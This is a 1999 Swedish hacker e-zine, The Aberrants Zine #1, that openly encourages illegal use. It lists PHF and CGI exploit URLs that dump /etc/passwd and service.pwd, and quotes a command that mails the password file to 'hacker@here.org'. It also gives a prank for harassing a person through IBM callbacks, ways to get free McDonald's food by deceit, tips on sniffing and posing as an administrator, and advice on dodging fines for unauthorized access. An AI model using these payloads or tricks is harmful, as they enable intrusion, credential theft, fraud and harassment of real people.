OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%,,,,,????????????,,,,,,,??????????????,,,,???,,,,,,,,,,,%% %%,,,??????????????,,,,,????????????????,,,???,??????????,%% %%,,??????????????,,,,??????????????????,,???,??????????,,%% %%,,????????????,,,,???????,,,,,????????,,,,,,,,,,,???,,,,%% %%,,,????????,,,,,????????,,,,,?????????,,,,,,,,,???,,,,,,%% %%,,????????,,,,????????????????????????,,,,,,,???,,,,,,,,%% %%,????????,,,??????????????????????????,,,,,???,,,,???,,,%% %%????????,,???????????,,,,,????????????,,????????,???,,,,%% %%???????,???????????,,,,,,,???????????,?????????,???,,,,,%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Innehåll i The Aberrants Zine #1 10/9 -99: 1 . Disclaimer. av: BugpOwer 2 . Inledning. av: BugpOwer 3 . PHF tekniken. av: Neurotic^ 4 . Problem? Ring IBM. av: dumone 5 . Gratis mat på McDonalds. av: j0h2n 6 . Class nätverk. av: Neurotic^ 7 . IP spoofing. av: Neurotic^ 8 . Ethernet sniffing. av: Neurotic^ 9 . Data och nätverkssäkerhet Del 1. av: N3UR0 10. IIS4 Buggen av: dumone 11. Sanningen bakom Micosoft Co. av: Neurotic^ 12. Utfors knasing. av: dumone 13. Nyheter av: Neurotic^ 14. Prenumerations info. [ ]*********************************************************************************[ ] [1.] Disclaimer. av: BugpOwer [ ] [ ]*********************************************************************************[ ] Disclaimer är för rädda människor som tror att fabror blå ligger och vakar över dom i deras garderob och att han när som helst skulle vara beredda på att hoppa ut och lysa med deras löjliga Maglite ficklampor i huvudet på dom och fråga dumma frågor. Så om ni väljer att göra något av det som finns i zinet så är det erat problem och inte vårat. [ ]*********************************************************************************[ ] [2.] Inledning. av: BugpOwer [ ] [ ]*********************************************************************************[ ] Nu har efter många om och men ätnligen första nytt av The Aberrants Zine släppts. Zinet är ett projekt som drivs av Level 8. Orsaken till at vi startade det hela var som många andra att det behövs men faktum är att det behövs verkligen ett bra Zine om H/C/N/S. Det finns för många exempel på zines som är riktigt jävla praktskit. Vi ska försöka hålla andan uppe så långt som möjligt och våran ambition är att hålla klassen uppe på zinet och inte lägga ner det efter några fåtal nummer. Vi har tyvärr ingen hemsida efter som en viss person stavade fel på The Aberrants när han skulle regga våran domän men om du vill ladda ner vårat zine så kör vi för närvarande på våran felstavade: http://www.the-abberrants.com. En ny domän regestrering har gjorts och vi kommer förhoppningsvis att få upp sidan i tid till nästa nummer som kommer att komma om ungefär en månad. Där kommer också ett arkiv med alla nummer att finnas. En domän till Level 8 kommer också upp inom en snar framtid. Level 8 består för närvarande av BugpOwer, Neurotic^, dumone, Phenomenia, CryoCore, hecil och Knash^. Tack för ordet. [ ]*********************************************************************************[ ] [3.] PHF Tekniken. av: Neurotic^ [ ] [ ]*********************************************************************************[ ] PHF tekniken är en gammal och känd bug som tillhör "underground" allmänbildningen. Visst, den är så gott som död men det finns dock även nyheter inom den. Om man frågar någon som man misstänker vara lite lam så brukar dom säga att dom använder sig av phf och ftp. Det är så satans lamt juh, men det finns dock nya sorters phfbuggar. Jag kallar inte det hacking nä, men vad ska man då definiera det som? För alla er som använder phf och anser dig vara hacker, tänk om och försök förstå att hacking inte handlar om 40 bytes i ditt fula opålitliga Internet Explorer! Alla fall, här är nyheterna inom phf (jag har själv inte testat men jag antar att dom funkar eftersom dom fanns med på bugtraq). /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd /cgi-bin/php.cgi?/etc/passwd /cgi-bin/phf?Q=x%0aypcat%20passwd /~root /cgi-bin/test-cgi?* HTTP/1.0 /cgi-bin/nph-test-cgi?* HTTP/1.0 /samples/search/queryhit.html NT /scripts/samples/search/webhits.exe NT /_vti_pvt/service.pwd NT Neurotic^ mixtile112@hotmail.com Level 8 [ ]*********************************************************************************[ ] [4.] Problem? Ring IBM. av: dumone [ ] [ ]*********************************************************************************[ ] Har du någon äcklig jävel i din närhet som du helst av allt skulle vilja skicka till solen utan retur. Bra , här kommer ännu ett tips i högen för att jävlas med någon. Ring 020-795 300 IBM direct service kontor, efter kl. 10 på kvällen eller något. Då kommer du få tala in ett medelande på deras automatiska telefonsvarare. Tala då in att du skulle vilja diskutera en affär eller något annat som låter viktigt och tala in din oväns telefon nr. (hemtelefon nr givetvis :) ). Nu e det klart nu kommer IBM ringa och fråga vad han ville. Upprepa den procedur varje kväll innan sängdags. dumone dumone@softhome.net Level 8 [ ]*********************************************************************************[ ] [5.] Gratis mat på McDonalds. av: j0h2n [ ] [ ]*********************************************************************************[ ] Personalen på McDonalds och liknande företag är väldigt rädda om sina kunder och för stämmningar. Därför kan du juh utnyttja detta i illegalt syfte. Det finns minst 4 olika sätt att göra det på och alla gör så att du får billigare eller gratis mat. Det första du kan göra är att beställa in en hamburgare och få den. Du bäter sedan nästan hela hamburgaren så att det bara finns en liten del kvar. Du tar sedan ett hårstrå och sätter det i hamburgaren. Efter det går du bara och klagar på att det är ett hårstrå i hamurgaren. Personalen kollar inte ens om det finns något hårstrå. Man får då direkt en ny hamburgare eller vad man vill ha. Det andra sättet funkar bäst om det är mycket folk och vid lunchtid när personalen är stressad. Du går helt enkelt fram till en kassa och säger ungefär såhär: - Var är min Big Mac? Jag har väntat en kvart! Du får förmodligen en Big Mac då eller vad du vill ha. Det tredje sättet är att beställa en stor vatten och sedan spilla ut den. Du går sedan till en annan kassa och säger att du råkade spilla ut din Sprite. Du får då en ny Sprite utan att betala. Det fjärde är att bara gå fram till en kassa och säga att du tappat hela din bricka med mat. Har du en helvetes tur får du nu en helt ny bricka med allt du vill ha. Sammanfattning: De flesta kände nog redan till dessa trix att käka gratis. Tänk på att det är du som gör sånt här som håller priserna på maten så höga. (Vem bryr sig? :) ) Och: Kommer dom på dig neka allt eller spring. j0h2n virus_5001@hotmail.com http://www.pclamer.cjb.net [ ]*********************************************************************************[ ] [6.] Class nätverk. av: Neurotic^ [ ] [ ]*********************************************************************************[ ] Class nätverk är olika till för att kunna anpassa ett nätverk efter så många host's som du har. Det delas upp i 5 olika delar, A, B, C, D och E Jag kommer bara skriva om A B och C efter som min kunskap är begränsad I framtiden kommer det troligtvis dyka upp fler txt filer från mig om class nätverk men även en del inom nätverk generellt sätt. Class nätverk är otroligt enkla att identifiera eftersom dom första bit'sen i IP'n (även kallat octet) avslöjar vilken typ av class nätverk dom har. Class A: Tanken med A var/är att USA's regering men främst stora företag som behäver mer än 65.000 host's skulle använda A. A klarar upp till 16miljoner host's och äver 126 nätverk per A vilket är otroligt mycket. IP'n sträcker sig från 0.0.0.0 --> 127.255.255.255 Class B: B är till får stora nätverk som inte kräver mer än 65.000 host's men med B kan du ha upptill 16380 nätverk per B. IP'n i detta fallet sträcker sig från 128.0.0.0 --> 191.255.255.255 Class C: C är till för mindre företag som klarar sig med 1-254 host's men C liksom B klarar många fler nätverk än A. C klarar hela 2097157 nätverk per C. IP'n sträcker sig från 192.0.0.0 --> 223.255.255 Neurotic^ mixtile112@hotmail.com Level 8 [ ]*********************************************************************************[ ] [7.]IP spoofing. av: Neurotic^ [ ] [ ]*********************************************************************************[ ] IP SPOOFING - En genomgång över drömmen Drömmen för många är att få vara osynliga på system och olika sorters nätverk, detta är inte så lätt som många kan tro. Jag själv har aldrig försökt mig på en tcp/ip attack i syfte med spoofing. Jag har fått komentarer såsom "Om du nu inte är en lamer, varför kör du inte genom proxy/wingate?", jag anser själv det vara helt onödigt att använda sånt för att forwarda min IP. Notera att detta inte är en spoofing attack. Varför vill man använda det för att koppla upp sig mot IRC nätverk? Den frågan ställer jag mig ofta och jag fann ett svar som jag tycker verkar rimligt. En som vill visa det lilla han kan genom att använda wingates. Vad kan man göra som är så olagligt på irc? Flooda? Spamma? eller rent av nuka? Då har man verkligen visat vem som är wannabe och vem som är en seriös användare. Visserligen finns det bra syfte med wingates/proxies. Om man ska carda vilket är ett bra alternativ till att springa och köpa en IBM med för instalerat windows och ett winmodem. En wingate/proxy gör sig bäst i ett LAN/WAN, där kan man behöva "ligga" bakom en säkrare och kraftfullare dator för att skydda mot eventuella attacker Jag vet hur en tcp/ip baserad IP spoofing attack fungerar och ser ut För ett tag sen såg jag dom här underbara raderna i en text fil som jag hadde liggande. Istället för att översätta och försöka få det att låta som om det var mina ord så pasta jag det direkt. "IP spoofing is where an attacker can predict the TCP sequence number of a trusted TCP session between two other machines and hijacks the session by modifying his IP address and injecting a single arbitary command. Eg "cat /etc/passwd | mail hacker@here.org". Now this is extremely advanced stuff and if you are reading this FYI, you probably wont know what I am talking about. I only include this here to let you know you cant use IP spoofing t o hide your IP address the way you want to" Jag hoppas jag gett dig en inblick i hur en spoofing attack fungerar (om du nu inte visste detta redan). Vill du läsa mer så kan jag glädja dig, vi på Level8 innehar många text filer som beskriver/förklarar olika sorters tcp/ip attacker. Dom kommer självklart att finnas på vårt (level8's) arkiv Neurotic^ mixtile112@hotmail.com Level 8 [ ]*********************************************************************************[ ] [8.] Ethernet sniffing. av: Neurotic^ [ ] [ ]*********************************************************************************[ ] Ethernet sniffing Ethernet snifing är när du (med programvara)lyssnar efter lösenord. Ett annat namn för denna konst är "Network monitoring" När programmet (sniffern) hittar ett ord som matchar en viss kriteria loggar den det och skickar det till en fil. Det den söker efter är ex "login" och "password". Att använda detta på en stor server kan ge en väldigt mycket information som kan tjäna syfte. Sniffers till dom vanliga OS'en kommer att finnas på level8's sida när den väl kommer upp... Neurotic^ mixtile112@hotmail.com Level 8 [ ]*********************************************************************************[ ] [9.] Data och Nätverkssäkerhet. Del 1. av: N3UR0 [ ] [ ]*********************************************************************************[ ] Här kommer första delen i en serie av artiklar om datasäkerhet och nätverkssäkerhet av mig. Jag uppmanar inte till brott. Hahaha!!! Happy Reading! :-) // N3UR0 Först lite allmänt om säkerhet i nätverk Datalagen: Enligt 21 S datalagen är det förbjudet att titta på, radera eller ändra andras information i datorer och på datamedier, om man inte har tillstånd att göra det. Det är också förbjudet att avlyssna datakommunikation. (Så ta det lugnt nu va???) Dåligt samspel är farligt! Säkerheten i nätverk är ett ständigt problem för administratören, men det är oftast först efter ett angrepp som frågan blir intressant. Fortfarande är den egna personalen den största riskfaktorn, men vad händer när företaget angrips utifrån? Tre kategorier... Angreppen brukar delas in i tre kategorier. Det första och vanligaste är att det drabbade företaget aldrig märker angreppet, som egentligen bara går ut på att titta på hur systemet är uppbyggt. Den andra kategorin är rena sabotage. Hemsidan kanske byts ut, en server tappar kontakten med nätet, hårddiskar raderas och så vidare. (Elaka crackers som är i farten..) Den tredje och minst vanliga kategorin handlar om intrång i syfte att hitta eller förändra information i vinstsyfte. Det kan vara prislistor som förändras, eller lagerdatabaser som börjar tappa data till förmån för ett konkurrrerande bolag. Detta är alltså industrispionage. Jag menar vad gör inte dem multinationella företagen för pengar igentligen? För många öppnas en ny värld efter ett intrång. Ordet säkerhet får en ny betydelse för dem. Vilka är det som har hand om säkerheten? I dag styr en grupp administratörer och samordnare. Dem samarbetar oftast med ett dataföretag som dem köpt allt av, så deras servicetekniker hjälper till vid stora problem. Annars är det gruppens uppgift att underhålla brandväggar och nätövervakningsutrustning. Dela ut rättigheter och se till att system hålls vid liv. Hur kan man komma in i nätverket? Ett sätt att komma åt lösenord och användarnamn är att lyssna av det lokala nätet med en "sniffer". All information ekas till alla anslutna arbetsstationer när en användare loggar in, och genom att lyssna av nätet kan vem som helst snappa upp informationen. Men vill man va lite iskall kan man köra lite social ingejörskonst på någon anställd. Hur gör man då? Jo, frågar de anställda om dessa uppgifter. Du kan till exempel utge dig för att vara en av administratörerna på företaget och sedan utnyttja den anställdes godtrogenhet. Det vanligaste sättet att attackera systemet är att försöka ta sig in från Internet. Genom att utnyttja kända buggar i olika system kan du ta sig längre och längre in i systemet. Rena sabotage blir allt vanligare!! Ett sätt som blivit populärt på senare tid är "SYN Flooding". Varje gång en webserver vill koppla upp sig mot en annan skickar den en uppkopplingsförfrågan, en SYN, som sedan besvaras med ett godkännande, ett ACK. Genom att oavbrutet sända förfrågningar, från en dessutom falsk avsändare, sätts webservern ur spel genom att hela tiden tvingas besvara anropen. Säkerhet kostar..! Många har levt med uppfattningen att säkerhet är gratis, eller följer med på köpet. Nu måste företagen lära sig att också man behöver pengar för säkerhetsarbetet. Det är inte ett engångsarbete att titta över säkerheten och kanske installera en brandvägg. All trafik genom en brandvägg måste hela tiden övervakas för att man över huvud taget ska kunna upptäcka angrepp eller oegentligheter. Dåligt med nätverkssäkerhet Mindre än hälften av småföretagen har en policy för nätverkssäkerhet, trots att de tänker ansluta sig till Internet inom ett år. Så är det i varje fall i USA, enligt en färsk undersökning. Nu är det inte företagen själva som har svarat, utan återförsäljare och nätverkskonsulter som bedömer sina kunder. Färre än hälften av kunderna har en säkerhetspolicy, anser de tillfrågade företagen. Endast tolv procent av dem har mer säkerhetsmedvetna kunder än så. En säkerhetspolicy är regler för vem som får komma åt företagets dataresurser, och under vilka omständigheter det får ske. Samtidigt kommer de flesta av dem att vara anslutna till Internet inom ett år, trots att knappt hälften av dem är det nu. Som små företag räknas företag med högst 25 anställda. 78 procent av de tillfrågade hade sådana företag som kunder. Endast 34 procent av de tillfrågade kunde rapportera att deras kunder använder en brandvägg som skydd mot dataintrång. Av dem som har en brandvägg har 58 procent bara en router. 53 procent har ingen annan datasäkerhet än lösenord, och 32 procent har ingen datasäkerhet alls. Så ni förstår läget nu va? Säkerhet är visst nåt som är inbyggt från början och följer med vid köp eller? Nu är den här artikeln slut, men nästa del kommer i nästa nummer. Det är bara att hålla ut.. N3UR0 count_zero_interrupt@usa.net [ ]*********************************************************************************[ ] [10] IIS4 Bug av: dumone [ ] [ ]*********************************************************************************[ ] IIS4 buggen är en bug i följande av microsofts system: Internet infomation server 4.0 (IIS4) Microsoft windows NT 4.0 Service Pack 3 Option Pack 4 Microsoft windows NT 4.0 Service Pack 4 Option Pack 4 Microsoft windows NT 4.0 Service Pack 5 Option Pack 4 Felet i hela systemet är det att filändelserna .ASP, .IDC, .HTR i dessa system är till för att skicka URL.en till DLL filer som sedan hanterar datat. Själva felet ligger i ISAPI.DLL för om den inte är bunden rätt kan en buffer overflow attack göra så man kan starta kod på servern remote. HTR filerna som man kör buffer overflow attacken genom är till för att windows NT användare ska kunna ändra sitt password via en nät katalog t.ex. /johan_e/ . Det man kan göra med IIS4 är att crasha hela servern om man kör en bufferoverflow. dumone dumone@softhome.net Level 8 [ ]*********************************************************************************[ ] [11] Sanningen bakom Microsoft CO. av: Neurotic^ [ ] [ ]*********************************************************************************[ ] Sanningen bakom Microsoft Co. Många hävdar att microsoft är ett mjukvaro företag som inte gör något annat. Jag Neurotic har kartlagt deras beteende och vanor, min slutsats är att dom är en ond rasistisk rörelse. Mitt bevis finns att hitta på http://nyheter.idg.se/display.pl?ID=990701-PFA1 Skriver man ordet "monkey" i publicher så kommer det upp en bild på en apa som sitter på en bänk. Jag visste hela tiden att det var mer än ett mjukvaro företag.. Detta är kanske lite humor men att dom är rasistiska stämmer.. 10 If kkk$ = "insecure" then goto 20 else end 20 input "Tell me the name of the most insecure OS"; ms$ 30 IF ms$ = "microsoft" then goto 40 else goto 20 Neurotic^ mixtile112@hotmail.com Level 8 [ ]*********************************************************************************[ ] [12] Utfors knasing. av: dumone [ ] [ ]*********************************************************************************[ ] Fler och fler surfar utfors på deras 0200 Nod'er som e gratis i kostar bara 23 öre i uppkopplings avgift. Nu i veckan fick jag höra för första gången om någon som hade knasat, zid- på #felia-020. Han knasade för ca 6-7 månader sedan han hade surfat 100 timmar ungefär på olika konton det han åkte fasst för var när kunden ringde in till polisen o anmälde det hela. Enligt zid- själv så var det utfors som gav böterna o inte snuten och det krävs en rättslig prövning i domstol osv. om det inte rörsig om ordningsböter såsom trafik böter osv. Zid- fick en lapp i brevlådan där stod att han skulle betala böterna 3000 :- + 1000 :- som han hade surfat för. Visst utfors kan skicka ut en lapp och 'be' en betala men man måste inte eftersom dom kan intetvinga en till det utan en rättslig prövning i en domstol. Och om utfors skulle anmäla dataintrånget som det sätts upp som så skulle dom inte inneha mer bevis än en datalogg och i dag räcker inte en datalogg som tillräkligt bevis för att väcka åtal i svensk domstol. T.ex. när spray hackern blev upptäckt var dom ju tvungna att ta och sno hans dator genom husransakan innan dom kunde väcka åtal. Därimot kan åklagaren om han e riktigt jävlig je husransaknings tillstånd så bengen kommer hemoch letar RAS i din dator och rör runt bland alla din fina tencho mp3or :) . Jag har pratat med en som studerade juridik och en advokat på IRC + att jaghar läst mycket i min SO bok, (den man trodde man alldrig skulle ha nytta av) :). Slutsats: Får du en lapp om böter från utfors så VÄGRA betala utan rättslig prövning, dvs med lite tur klarar du dig undan helt efter som åklagaren inte väcker åtal. dumone dumone@softhome.net Level 8 [ ]*********************************************************************************[ ] [13] Nyheter. [ ] [ ]*********************************************************************************[ ] Antionline stämmer Harvard, HNC skapar protester mot anitonline John Vranesevich, från www.antionline.com hotar Harvard med stämmning med anledning av innehållet i katalogen jp/ på packetstorm-security's web sida som låg på http://packetstorm.harvard.edu John Vranesevich påstår att dom använde servern för att trakasera och hota honom och hans familj och hans affärer Detta resulterade att sidan och allt material är nere. Enligt Jeff Moss så ska allt material vara raderat, medans man kan läsa på hackernews.com att allt är räddat. Vad är rätt? Själv så tyckte jag ganska bra om packetstorm security och jag stöder dem till 100% i kampen mot JP Läs mer om det på http://www.hack-net.com/antionline/ Källa: www.hack-net.com & www.hackernews.com [ ]*********************************************************************************[ ] [14] Prenumerera nu! [ ] [ ]*********************************************************************************[ ] Om du vill starta en prenumeration på TA vilket du naturligtvis vill så ska du skicka ett E-Mail till the.aberrants@level8.cjb.net med ämnet subscribe-ta eller något i den stilen. Om du vill sluta prenumerera så kan du skicka va fan du vill till dev/null. Vi behöver artiklar till nästa nummer dessa kan du skicka till ovanstående address d.v.s the.aberrants@level8.cjb.net. Kändiskap och snygga brudar utlovas till alla som skriver en artikel. [ ]*********************************************************************************[ ]